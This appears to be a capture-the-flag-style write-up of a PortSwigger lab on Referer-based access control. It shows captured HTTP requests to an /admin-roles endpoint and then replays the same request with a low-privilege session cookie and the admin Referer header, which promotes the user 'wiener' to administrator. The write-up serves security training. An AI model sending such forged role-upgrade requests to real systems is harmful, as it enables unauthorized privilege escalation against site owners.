Skip to content

Referer-based access control

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Point: PRACTITIONER

Recon

The admin panel is reveal to us but when we try to access it, the server return " Admin interface only available if logged in as an administrator"

Try administrator account, when you promote carlos user to admin, the client send the request to the server though endpoint /admin-roles with the username carlos and the action upgrade.

The server response us with a from that confirm us.

After confirm, the client will add confirmed=true to the 

POST /admin-roles HTTP/2
Host: 0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Cookie: session=admin_redacted
Content-Length: 45
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

action = upgrade &
confirmed = true &
username = carlos

Exploit

The page have a mechanism that block us from access the admin panel /admin, but failed to block us at /admin-roles endpoint. Using that endpoint with any valid session and the website will promote us to administrator.

Using request confirm from the earlier stage that we found out, change the session to wiener account and promote wiener to complete the labs.

POST /admin-roles HTTP/2
Host: 0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Cookie: session=wiener_redacted
Content-Length: 45
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

action = upgrade &
confirmed = true &
username = wiener

solved.png